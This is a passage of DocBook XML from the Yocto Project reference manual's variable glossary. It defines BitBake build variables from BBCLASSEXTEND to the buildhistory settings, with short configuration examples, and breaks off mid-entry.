- <glossentry id='var-BBCLASSEXTEND'><glossterm>BBCLASSEXTEND</glossterm>
- <info>
- BBCLASSEXTEND[doc] = "Allows you to extend a recipe so that it builds variants of the software. Common variants for recipes are 'native', 'cross', 'nativesdk', and multilibs."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Allows you to extend a recipe so that it builds variants of the software.
- Common variants for recipes exist such as "natives" like <filename>quilt-native</filename>,
- which is a copy of Quilt built to run on the build system;
- "crosses" such as <filename>gcc-cross</filename>,
- which is a compiler built to run on the build machine but produces binaries
- that run on the target <link linkend='var-MACHINE'><filename>MACHINE</filename></link>;
- "nativesdk", which targets the SDK machine instead of <filename>MACHINE</filename>;
- and "mulitlibs" in the form "<filename>multilib:</filename><replaceable>multilib_name</replaceable>".
- </para>
-
- <para>
- To build a different variant of the recipe with a minimal amount of code, it usually
- is as simple as adding the following to your recipe:
- <literallayout class='monospaced'>
- BBCLASSEXTEND =+ "native nativesdk"
- BBCLASSEXTEND =+ "multilib:<replaceable>multilib_name</replaceable>"
- </literallayout>
- <note>
- <para>
- Internally, the <filename>BBCLASSEXTEND</filename>
- mechanism generates recipe variants by rewriting
- variable values and applying overrides such as
- <filename>_class-native</filename>.
- For example, to generate a native version of a recipe,
- a
- <link linkend='var-DEPENDS'><filename>DEPENDS</filename></link>
- on "foo" is rewritten to a <filename>DEPENDS</filename>
- on "foo-native".
- </para>
-
- <para>
- Even when using <filename>BBCLASSEXTEND</filename>, the
- recipe is only parsed once.
- Parsing once adds some limitations.
- For example, it is not possible to
- include a different file depending on the variant,
- since <filename>include</filename> statements are
- processed when the recipe is parsed.
- </para>
- </note>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-BBFILE_COLLECTIONS'><glossterm>BBFILE_COLLECTIONS</glossterm>
- <info>
- BBFILE_COLLECTIONS[doc] = "Lists the names of configured layers. These names are used to find the other BBFILE_* variables."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Lists the names of configured layers.
- These names are used to find the other <filename>BBFILE_*</filename>
- variables.
- Typically, each layer will append its name to this variable in its
- <filename>conf/layer.conf</filename> file.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-BBFILE_PATTERN'><glossterm>BBFILE_PATTERN</glossterm>
- <info>
- BBFILE_PATTERN[doc] = "Variable that expands to match files from BBFILES in a particular layer. This variable is used in the layer.conf file and must be suffixed with the name of a layer."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Variable that expands to match files from
- <link linkend='var-BBFILES'><filename>BBFILES</filename></link>
- in a particular layer.
- This variable is used in the <filename>conf/layer.conf</filename> file and must
- be suffixed with the name of the specific layer (e.g.
- <filename>BBFILE_PATTERN_emenlow</filename>).
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-BBFILE_PRIORITY'><glossterm>BBFILE_PRIORITY</glossterm>
- <info>
- BBFILE_PRIORITY[doc] = "Assigns the priority for recipe files in each layer. Setting this variable allows you to prioritize a layer against other layers that contain the same recipe."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Assigns the priority for recipe files in each layer.
- </para>
-
- <para>
- This variable is useful in situations where the same recipe appears in
- more than one layer.
- Setting this variable allows you to prioritize a
- layer against other layers that contain the same recipe - effectively
- letting you control the precedence for the multiple layers.
- The precedence established through this variable stands regardless of a
- recipe's version
- (<link linkend='var-PV'><filename>PV</filename></link> variable).
- For example, a layer that has a recipe with a higher <filename>PV</filename> value but for
- which the <filename>BBFILE_PRIORITY</filename> is set to have a lower precedence still has a
- lower precedence.
- </para>
-
- <para>
- A larger value for the <filename>BBFILE_PRIORITY</filename> variable results in a higher
- precedence.
- For example, the value 6 has a higher precedence than the value 5.
- If not specified, the <filename>BBFILE_PRIORITY</filename> variable is set based on layer
- dependencies (see the
- <filename><link linkend='var-LAYERDEPENDS'>LAYERDEPENDS</link></filename> variable for
- more information.
- The default priority, if unspecified
- for a layer with no dependencies, is the lowest defined priority + 1
- (or 1 if no priorities are defined).
- </para>
- <tip>
- You can use the command <filename>bitbake-layers show-layers</filename> to list
- all configured layers along with their priorities.
- </tip>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-BBFILES'><glossterm>BBFILES</glossterm>
- <info>
- BBFILES[doc] = "A space-separated list of recipe files BitBake uses to build software."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- A space-separated list of recipe files BitBake uses to
- build software.
- </para>
-
- <para>
- When specifying recipe files, you can pattern match using
- Python's
- <ulink url='https://docs.python.org/3/library/glob.html'><filename>glob</filename></ulink>
- syntax.
- For details on the syntax, see the documentation by
- following the previous link.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-BBFILES_DYNAMIC'><glossterm>BBFILES_DYNAMIC</glossterm>
- <info>
- BBFILES_DYNAMIC[doc] = "Activates content when identified layers are present."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Activates content when identified layers are present.
- You identify the layers by the collections that the layers
- define.
- </para>
-
- <para>
- Use the <filename>BBFILES_DYNAMIC</filename> variable to
- avoid <filename>.bbappend</filename> files whose
- corresponding <filename>.bb</filename> file is in a layer
- that attempts to modify other layers through
- <filename>.bbappend</filename> but does not want to
- introduce a hard dependency on those other layers.
- </para>
-
- <para>
- Use the following form for
- <filename>BBFILES_DYNAMIC</filename>:
- <literallayout class='monospaced'>
- <replaceable>collection_name</replaceable>:<replaceable>filename_pattern</replaceable>
- </literallayout>
- The following example identifies two collection names and
- two filename patterns:
- <literallayout class='monospaced'>
- BBFILES_DYNAMIC += " \
- clang-layer:${LAYERDIR}/bbappends/meta-clang/*/*/*.bbappend \
- core:${LAYERDIR}/bbappends/openembedded-core/meta/*/*/*.bbappend \
- "
- </literallayout>
- This next example shows an error message that occurs
- because invalid entries are found, which cause parsing to
- abort:
- <literallayout class='monospaced'>
- ERROR: BBFILES_DYNAMIC entries must be of the form &lt;collection name&gt;:&lt;filename pattern&gt;, not:
- /work/my-layer/bbappends/meta-security-isafw/*/*/*.bbappend
- /work/my-layer/bbappends/openembedded-core/meta/*/*/*.bbappend
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-BBINCLUDELOGS'><glossterm>BBINCLUDELOGS</glossterm>
- <info>
- BBINCLUDELOGS[doc] = "Variable that controls how BitBake displays logs on build failure."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Variable that controls how BitBake displays logs on build failure.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-BBINCLUDELOGS_LINES'><glossterm>BBINCLUDELOGS_LINES</glossterm>
- <info>
- BBINCLUDELOGS_LINES[doc] = "Amount of log lines printed on failure."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- If
- <link linkend='var-BBINCLUDELOGS'><filename>BBINCLUDELOGS</filename></link>
- is set, specifies the maximum number of lines from the
- task log file to print when reporting a failed task.
- If you do not set <filename>BBINCLUDELOGS_LINES</filename>,
- the entire log is printed.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-BBLAYERS'><glossterm>BBLAYERS</glossterm>
- <info>
- BBLAYERS[doc] = "Lists the layers to enable during the build. This variable is defined in the bblayers.conf configuration file."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Lists the layers to enable during the build.
- This variable is defined in the <filename>bblayers.conf</filename> configuration
- file in the
- <link linkend='build-directory'>Build Directory</link>.
- Here is an example:
- <literallayout class='monospaced'>
- BBLAYERS = " \
- /home/scottrif/poky/meta \
- /home/scottrif/poky/meta-poky \
- /home/scottrif/poky/meta-yocto-bsp \
- /home/scottrif/poky/meta-mykernel \
- "
- </literallayout>
- </para>
-
- <para>
- This example enables four layers, one of which is a custom, user-defined layer
- named <filename>meta-mykernel</filename>.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-BBMASK'><glossterm>BBMASK</glossterm>
- <info>
- BBMASK[doc] = "Prevents BitBake from processing specific recipes or recipe append files."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Prevents BitBake from processing recipes and recipe
- append files.
- </para>
-
- <para>
- You can use the <filename>BBMASK</filename> variable
- to "hide" these <filename>.bb</filename> and
- <filename>.bbappend</filename> files.
- BitBake ignores any recipe or recipe append files that
- match any of the expressions.
- It is as if BitBake does not see them at all.
- Consequently, matching files are not parsed or otherwise
- used by BitBake.
- </para>
-
- <para>
- The values you provide are passed to Python's regular
- expression compiler.
- Consequently, the syntax follows Python's Regular
- Expression (re) syntax.
- The expressions are compared against the full paths to
- the files.
- For complete syntax information, see Python's
- documentation at
- <ulink url='http://docs.python.org/3/library/re.html#re'></ulink>.
- </para>
-
- <para>
- The following example uses a complete regular expression
- to tell BitBake to ignore all recipe and recipe append
- files in the <filename>meta-ti/recipes-misc/</filename>
- directory:
- <literallayout class='monospaced'>
- BBMASK = "meta-ti/recipes-misc/"
- </literallayout>
- If you want to mask out multiple directories or recipes,
- you can specify multiple regular expression fragments.
- This next example masks out multiple directories and
- individual recipes:
- <literallayout class='monospaced'>
- BBMASK += "/meta-ti/recipes-misc/ meta-ti/recipes-ti/packagegroup/"
- BBMASK += "/meta-oe/recipes-support/"
- BBMASK += "/meta-foo/.*/openldap"
- BBMASK += "opencv.*\.bbappend"
- BBMASK += "lzma"
- </literallayout>
- <note>
- When specifying a directory name, use the trailing
- slash character to ensure you match just that directory
- name.
- </note>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-BBMULTICONFIG'><glossterm>BBMULTICONFIG</glossterm>
- <info>
- BBMULTICONFIG[doc] = "Specifies each additional separate configuration when you are building targets with multiple configurations."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies each additional separate configuration when you
- are building targets with multiple configurations.
- Use this variable in your
- <filename>conf/local.conf</filename> configuration file.
- Specify a <replaceable>multiconfigname</replaceable> for
- each configuration file you are using.
- For example, the following line specifies three
- configuration files:
- <literallayout class='monospaced'>
- BBMULTICONFIG = "configA configB configC"
- </literallayout>
- Each configuration file you use must reside in the
- <link linkend='build-directory'>Build Directory</link>
- <filename>conf/multiconfig</filename> directory
- (e.g.
- <replaceable>build_directory</replaceable><filename>/conf/multiconfig/configA.conf</filename>).
- </para>
-
- <para>
- For information on how to use
- <filename>BBMULTICONFIG</filename> in an environment that
- supports building targets with multiple configurations,
- see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#dev-building-images-for-multiple-targets-using-multiple-configurations'>Building Images for Multiple Targets Using Multiple Configurations</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-BBPATH'><glossterm>BBPATH</glossterm>
- <info>
- BBPATH[doc] = "Used by BitBake to locate .bbclass and configuration files. This variable is analogous to the PATH variable."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Used by BitBake to locate
- <filename>.bbclass</filename> and configuration files.
- This variable is analogous to the
- <filename>PATH</filename> variable.
- <note>
- If you run BitBake from a directory outside of the
- <link linkend='build-directory'>Build Directory</link>,
- you must be sure to set
- <filename>BBPATH</filename> to point to the
- Build Directory.
- Set the variable as you would any environment variable
- and then run BitBake:
- <literallayout class='monospaced'>
- $ BBPATH = "<replaceable>build_directory</replaceable>"
- $ export BBPATH
- $ bitbake <replaceable>target</replaceable>
- </literallayout>
- </note>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-BBSERVER'><glossterm>BBSERVER</glossterm>
- <info>
- BBSERVER[doc] = "Points to the BitBake remote server."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- If defined in the BitBake environment,
- <filename>BBSERVER</filename> points to the BitBake
- remote server.
- </para>
-
- <para>
- Use the following format to export the variable to the
- BitBake environment:
- <literallayout class='monospaced'>
- export BBSERVER=localhost:$port
- </literallayout>
- </para>
-
- <para>
- By default, <filename>BBSERVER</filename> also appears in
- <ulink url='&YOCTO_DOCS_BB_URL;#var-BB_HASHBASE_WHITELIST'><filename>BB_HASHBASE_WHITELIST</filename></ulink>.
- Consequently, <filename>BBSERVER</filename> is excluded
- from checksum and dependency data.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-BINCONFIG'><glossterm>BINCONFIG</glossterm>
- <info>
- BINCONFIG[doc] = "When inheriting the binconfig-disabled class, this variable specifies binary configuration scripts to disable in favor of using pkg-config to query the information."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- When inheriting the
- <link linkend='ref-classes-binconfig-disabled'><filename>binconfig-disabled</filename></link>
- class, this variable specifies binary configuration
- scripts to disable in favor of using
- <filename>pkg-config</filename> to query the information.
- The <filename>binconfig-disabled</filename> class will
- modify the specified scripts to return an error so that
- calls to them can be easily found and replaced.
- </para>
-
- <para>
- To add multiple scripts, separate them by spaces.
- Here is an example from the <filename>libpng</filename>
- recipe:
- <literallayout class='monospaced'>
- BINCONFIG = "${bindir}/libpng-config ${bindir}/libpng16-config"
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-BINCONFIG_GLOB'><glossterm>BINCONFIG_GLOB</glossterm>
- <info>
- BINCONFIG_GLOB[doc] = "When inheriting binconfig.bbclass from a recipe, this variable specifies a wildcard for configuration scripts that need editing."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- When inheriting the
- <link linkend='ref-classes-binconfig'><filename>binconfig</filename></link>
- class, this variable specifies a wildcard for
- configuration scripts that need editing.
- The scripts are edited to correct any paths that have been
- set up during compilation so that they are correct for
- use when installed into the sysroot and called by the
- build processes of other recipes.
- <note>
- The <filename>BINCONFIG_GLOB</filename> variable
- uses
- <ulink url='http://tldp.org/LDP/abs/html/globbingref.html'>shell globbing</ulink>,
- which is recognition and expansion of wildcards during
- pattern matching.
- Shell globbing is very similar to
- <ulink url='https://docs.python.org/2/library/fnmatch.html#module-fnmatch'><filename>fnmatch</filename></ulink>
- and
- <ulink url='https://docs.python.org/2/library/glob.html'><filename>glob</filename></ulink>.
- </note>
- </para>
-
- <para>
- For more information on how this variable works, see
- <filename>meta/classes/binconfig.bbclass</filename> in the
- <link linkend='source-directory'>Source Directory</link>.
- You can also find general information on the class in the
- "<link linkend='ref-classes-binconfig'><filename>binconfig.bbclass</filename></link>"
- section.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-BP'><glossterm>BP</glossterm>
- <info>
- BP[doc] = "The base recipe name and version but without any special recipe name suffix (i.e. -native, lib64-, and so forth). BP is comprised of ${BPN}-${PV}"
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The base recipe name and version but without any special
- recipe name suffix (i.e. <filename>-native</filename>, <filename>lib64-</filename>,
- and so forth).
- <filename>BP</filename> is comprised of the following:
- <literallayout class="monospaced">
- ${BPN}-${PV}
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-BPN'><glossterm>BPN</glossterm>
- <info>
- BPN[doc] = "This variable is a version of the PN variable but removes common suffixes and prefixes."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- This variable is a version of the
- <link linkend='var-PN'><filename>PN</filename></link>
- variable with common prefixes and suffixes
- removed, such as <filename>nativesdk-</filename>,
- <filename>-cross</filename>,
- <filename>-native</filename>, and multilib's
- <filename>lib64-</filename> and
- <filename>lib32-</filename>.
- The exact lists of prefixes and suffixes removed are
- specified by the
- <link linkend='var-MLPREFIX'><filename>MLPREFIX</filename></link>
- and
- <link linkend='var-SPECIAL_PKGSUFFIX'><filename>SPECIAL_PKGSUFFIX</filename></link>
- variables, respectively.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-BUGTRACKER'><glossterm>BUGTRACKER</glossterm>
- <info>
- BUGTRACKER[doc] = "Specifies a URL for an upstream bug tracking website for a recipe."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies a URL for an upstream bug tracking website for
- a recipe.
- The OpenEmbedded build system does not use this variable.
- Rather, the variable is a useful pointer in case a bug
- in the software being built needs to be manually reported.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-BUILD_ARCH'><glossterm>BUILD_ARCH</glossterm>
- <info>
- BUILD_ARCH[doc] = "The name of the building architecture (e.g. i686)."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the architecture of the build host
- (e.g. <filename>i686</filename>).
- The OpenEmbedded build system sets the value of
- <filename>BUILD_ARCH</filename> from the machine name
- reported by the <filename>uname</filename> command.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-BUILD_AS_ARCH'><glossterm>BUILD_AS_ARCH</glossterm>
- <info>
- BUILD_AS_ARCH[doc] = "Specifies the architecture-specific assembler flags for the build host."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the architecture-specific assembler flags for
- the build host. By default, the value of
- <filename>BUILD_AS_ARCH</filename> is empty.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-BUILD_CC_ARCH'><glossterm>BUILD_CC_ARCH</glossterm>
- <info>
- BUILD_CC_ARCH[doc] = "Specifies the architecture-specific C compiler flags for the build host."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the architecture-specific C compiler flags for
- the build host. By default, the value of
- <filename>BUILD_CC_ARCH</filename> is empty.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-BUILD_CCLD'><glossterm>BUILD_CCLD</glossterm>
- <info>
- BUILD_CCLD[doc] = "Specifies the linker command to be used for the build host when the C compiler is being used as the linker."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the linker command to be used for the build host
- when the C compiler is being used as the linker. By default,
- <filename>BUILD_CCLD</filename> points to GCC and passes as
- arguments the value of
- <link linkend='var-BUILD_CC_ARCH'><filename>BUILD_CC_ARCH</filename></link>,
- assuming <filename>BUILD_CC_ARCH</filename> is set.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-BUILD_CFLAGS'><glossterm>BUILD_CFLAGS</glossterm>
- <info>
- BUILD_CFLAGS[doc] = "Specifies the flags to pass to the C compiler when building for the build host."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the flags to pass to the C compiler when building
- for the build host.
- When building in the <filename>-native</filename> context,
- <link linkend='var-CFLAGS'><filename>CFLAGS</filename></link>
- is set to the value of this variable by default.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-BUILD_CPPFLAGS'><glossterm>BUILD_CPPFLAGS</glossterm>
- <info>
- BUILD_CPPFLAGS[doc] = "Specifies the flags to pass to the C preprocessor (i.e. to both the C and the C++ compilers) when building for the build host."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the flags to pass to the C preprocessor
- (i.e. to both the C and the C++ compilers) when building
- for the build host.
- When building in the <filename>-native</filename> context,
- <link linkend='var-CPPFLAGS'><filename>CPPFLAGS</filename></link>
- is set to the value of this variable by default.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-BUILD_CXXFLAGS'><glossterm>BUILD_CXXFLAGS</glossterm>
- <info>
- BUILD_CXXFLAGS[doc] = "Specifies the flags to pass to the C++ compiler when building for the build host."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the flags to pass to the C++ compiler when
- building for the build host.
- When building in the <filename>-native</filename> context,
- <link linkend='var-CXXFLAGS'><filename>CXXFLAGS</filename></link>
- is set to the value of this variable by default.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-BUILD_FC'><glossterm>BUILD_FC</glossterm>
- <info>
- BUILD_FC[doc] = "Specifies the Fortran compiler command for the build host."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the Fortran compiler command for the build host.
- By default, <filename>BUILD_FC</filename> points to
- Gfortran and passes as arguments the value of
- <link linkend='var-BUILD_CC_ARCH'><filename>BUILD_CC_ARCH</filename></link>,
- assuming <filename>BUILD_CC_ARCH</filename> is set.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-BUILD_LD'><glossterm>BUILD_LD</glossterm>
- <info>
- BUILD_LD[doc] = "Specifies the linker command for the build host."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the linker command for the build host. By default,
- <filename>BUILD_LD</filename> points to the GNU linker (ld)
- and passes as arguments the value of
- <link linkend='var-BUILD_LD_ARCH'><filename>BUILD_LD_ARCH</filename></link>,
- assuming <filename>BUILD_LD_ARCH</filename> is set.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-BUILD_LD_ARCH'><glossterm>BUILD_LD_ARCH</glossterm>
- <info>
- BUILD_LD_ARCH[doc] = "Specifies architecture-specific linker flags for the build."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies architecture-specific linker flags for the build
- host. By default, the value of
- <filename>BUILD_LD_ARCH</filename> is empty.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-BUILD_LDFLAGS'><glossterm>BUILD_LDFLAGS</glossterm>
- <info>
- BUILD_LDFLAGS[doc] = "Specifies the flags to pass to the linker when building for the build host."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the flags to pass to the linker when building
- for the build host.
- When building in the <filename>-native</filename> context,
- <link linkend='var-LDFLAGS'><filename>LDFLAGS</filename></link>
- is set to the value of this variable by default.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-BUILD_OPTIMIZATION'><glossterm>BUILD_OPTIMIZATION</glossterm>
- <info>
- BUILD_OPTIMIZATION[doc] = "Specifies the optimization flags passed to the C compiler when building for the build host or the SDK."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the optimization flags passed to the C compiler
- when building for the build host or the SDK.
- The flags are passed through the
- <link linkend='var-BUILD_CFLAGS'><filename>BUILD_CFLAGS</filename></link>
- and
- <link linkend='var-BUILDSDK_CFLAGS'><filename>BUILDSDK_CFLAGS</filename></link>
- default values.
- </para>
-
- <para>
- The default value of the
- <filename>BUILD_OPTIMIZATION</filename> variable is
- "-O2 -pipe".
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-BUILD_OS'><glossterm>BUILD_OS</glossterm>
- <info>
- BUILD_OS[doc] = "The operating system (in lower case) of the building architecture (e.g. Linux)."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the operating system in use on the build
- host (e.g. "linux").
- The OpenEmbedded build system sets the value of
- <filename>BUILD_OS</filename> from the OS reported by
- the <filename>uname</filename> command - the first word,
- converted to lower-case characters.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-BUILD_PREFIX'><glossterm>BUILD_PREFIX</glossterm>
- <info>
- BUILD_PREFIX[doc] = "The toolchain binary prefix used for native recipes."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The toolchain binary prefix used for native recipes.
- The OpenEmbedded build system uses the
- <filename>BUILD_PREFIX</filename> value to set the
- <link linkend='var-TARGET_PREFIX'><filename>TARGET_PREFIX</filename></link>
- when building for <filename>native</filename> recipes.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-BUILD_STRIP'><glossterm>BUILD_STRIP</glossterm>
- <info>
- BUILD_STRIP[doc] = "Specifies the command to be used to strip debugging symbols from binaries produced for the build host."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the command to be used to strip debugging symbols
- from binaries produced for the build host. By default,
- <filename>BUILD_STRIP</filename> points to
- <filename>${</filename><link linkend='var-BUILD_PREFIX'><filename>BUILD_PREFIX</filename></link><filename>}strip</filename>.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-BUILD_SYS'><glossterm>BUILD_SYS</glossterm>
- <info>
- BUILD_SYS[doc] = "The toolchain binary prefix used for native recipes."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the system, including the architecture and
- the operating system, to use when building for the build
- host (i.e. when building <filename>native</filename>
- recipes).
- </para>
-
- <para>
- The OpenEmbedded build system automatically sets this
- variable based on
- <link linkend='var-BUILD_ARCH'><filename>BUILD_ARCH</filename></link>,
- <link linkend='var-BUILD_VENDOR'><filename>BUILD_VENDOR</filename></link>,
- and
- <link linkend='var-BUILD_OS'><filename>BUILD_OS</filename></link>.
- You do not need to set the <filename>BUILD_SYS</filename>
- variable yourself.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-BUILD_VENDOR'><glossterm>BUILD_VENDOR</glossterm>
- <info>
- BUILD_VENDOR[doc] = "The vendor name to use when building for the build host."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the vendor name to use when building for the
- build host.
- The default value is an empty string ("").
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-BUILDDIR'><glossterm>BUILDDIR</glossterm>
- <info>
- BUILDDIR[doc] = "Points to the location of the Build Directory."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Points to the location of the
- <link linkend='build-directory'>Build Directory</link>.
- You can define this directory indirectly through the
- <link linkend='structure-core-script'><filename>&OE_INIT_FILE;</filename></link>
- script by passing in a Build Directory path when you run
- the script.
- If you run the script and do not provide a Build Directory
- path, the <filename>BUILDDIR</filename> defaults to
- <filename>build</filename> in the current directory.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-BUILDHISTORY_COMMIT'><glossterm>BUILDHISTORY_COMMIT</glossterm>
- <info>
- BUILDHISTORY_COMMIT[doc] = "When inheriting the buildhistory class, this variable specifies whether or not to commit the build history output in a local Git repository."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- When inheriting the
- <link linkend='ref-classes-buildhistory'><filename>buildhistory</filename></link>
- class, this variable specifies whether or not to commit the
- build history output in a local Git repository.
- If set to "1", this local repository will be maintained
- automatically by the
- <filename>buildhistory</filename>
- class and a commit will be created on every
- build for changes to each top-level subdirectory of the
- build history output (images, packages, and sdk).
- If you want to track changes to build history over
- time, you should set this value to "1".
- </para>
-
- <para>
- By default, the <filename>buildhistory</filename> class
- does not commit the build history output in a local
- Git repository:
- <literallayout class='monospaced'>
- BUILDHISTORY_COMMIT ?= "0"
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-BUILDHISTORY_COMMIT_AUTHOR'><glossterm>BUILDHISTORY_COMMIT_AUTHOR</glossterm>
- <info>
- BUILDHISTORY_COMMIT_AUTHOR[doc] = "When inheriting the buildhistory class, this variable specifies the author to use for each Git commit."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- When inheriting the
- <link linkend='ref-classes-buildhistory'><filename>buildhistory</filename></link>
- class, this variable specifies the author to use for each
- Git commit.
- In order for the <filename>BUILDHISTORY_COMMIT_AUTHOR</filename>
- variable to work, the
- <link linkend='var-BUILDHISTORY_COMMIT'><filename>BUILDHISTORY_COMMIT</filename></link>
- variable must be set to "1".
- </para>
-
- <para>
- Git requires that the value you provide for the
- <filename>BUILDHISTORY_COMMIT_AUTHOR</filename> variable
- takes the form of "name <replaceable>email@host</replaceable>".
- Providing an email address or host that is not valid does
- not produce an error.
- </para>
-
- <para>
- By default, the <filename>buildhistory</filename> class
- sets the variable as follows:
- <literallayout class='monospaced'>
- BUILDHISTORY_COMMIT_AUTHOR ?= "buildhistory &lt;buildhistory@${DISTRO}&gt;"
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-BUILDHISTORY_DIR'><glossterm>BUILDHISTORY_DIR</glossterm>
- <info>
- BUILDHISTORY_DIR[doc] = "When inheriting the buildhistory class, this variable specifies the directory in which build history information is kept."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- When inheriting the
- <link linkend='ref-classes-buildhistory'><filename>buildhistory</filename></link>
- class, this variable specifies the directory in which
- build history information is kept.
- For more information on how the variable works, see the
- <filename>buildhistory.class</filename>.
- </para>
-
- <para>
- By default, the <filename>buildhistory</filename> class
- sets the directory as follows:
- <literallayout class='monospaced'>
- BUILDHISTORY_DIR ?= "${TOPDIR}/buildhistory"
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-BUILDHISTORY_FEATURES'><glossterm>BUILDHISTORY_FEATURES</glossterm>
- <info>
- BUILDHISTORY_FEATURES[doc] = "When inheriting the buildhistory class, this variable specifies the build history features to be enabled."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- When inheriting the
- <link linkend='ref-classes-buildhistory'><filename>buildhistory</filename></link>
- class, this variable specifies the build history features
- to be enabled.
- For more information on how build history works, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#maintaining-build-output-quality'>Maintaining Build Output Quality</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para>
-
- <para>
- You can specify these features in the form of a
- space-separated list:
- <itemizedlist>
- <listitem><para><emphasis>image:</emphasis>
- Analysis of the contents of images, which
- includes the list of installed packages among other
- things.
- </para></listitem>
- <listitem><para><emphasis>package:</emphasis>
- Analysis of the contents of individual packages.
- </para></listitem>
- <listitem><para><emphasis>sdk:</emphasis>
- Analysis of the contents of the software
- development kit (SDK).
- </para></listitem>
- <listitem><para><emphasis>task:</emphasis>
- Save output file signatures for
- <ulink url='&YOCTO_DOCS_OM_URL;#shared-state-cache'>shared state</ulink>
- (sstate) tasks.
- This saves one file per task and lists the SHA-256
- checksums for each file staged (i.e. the output of
- the task).
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- By default, the <filename>buildhistory</filename> class
- enables the following features:
- <literallayout class='monospaced'>
- BUILDHISTORY_FEATURES ?= "image package sdk"
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-BUILDHISTORY_IMAGE_FILES'><glossterm>BUILDHISTORY_IMAGE_FILES</glossterm>
- <info>
- BUILDHISTORY_IMAGE_FILES[doc] = "When inheriting the buildhistory class, this variable specifies a list of paths to files copied from the image contents into the build history directory under an "image-files" directory in the directory for the image, so that you can track the contents of each file."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- When inheriting the
- <link linkend='ref-classes-buildhistory'><filename>buildhistory</filename></link>
- class, this variable specifies a list of paths to files
- copied from the
- image contents into the build history directory under
- an "image-files" directory in the directory for
